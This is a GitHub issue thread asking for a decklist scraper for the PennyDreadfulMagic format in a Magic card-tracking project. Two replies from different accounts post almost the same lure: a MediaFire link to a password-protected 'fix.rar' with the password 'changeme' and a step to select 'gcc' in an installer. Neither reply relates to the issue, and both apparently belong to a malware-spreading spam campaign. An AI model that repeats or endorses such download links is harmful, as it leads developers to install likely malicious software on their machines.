### ISSUE TITLE
PennyDreadfulMagic decklist scraper

### ISSUE THREAD

**Issue by z33kz33k** [z33kz33k/mtgcards#79]
So, it seems this format has its own pet decklist site

Video: https://www.youtube.com/watch?v=RvEax4-jWck

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
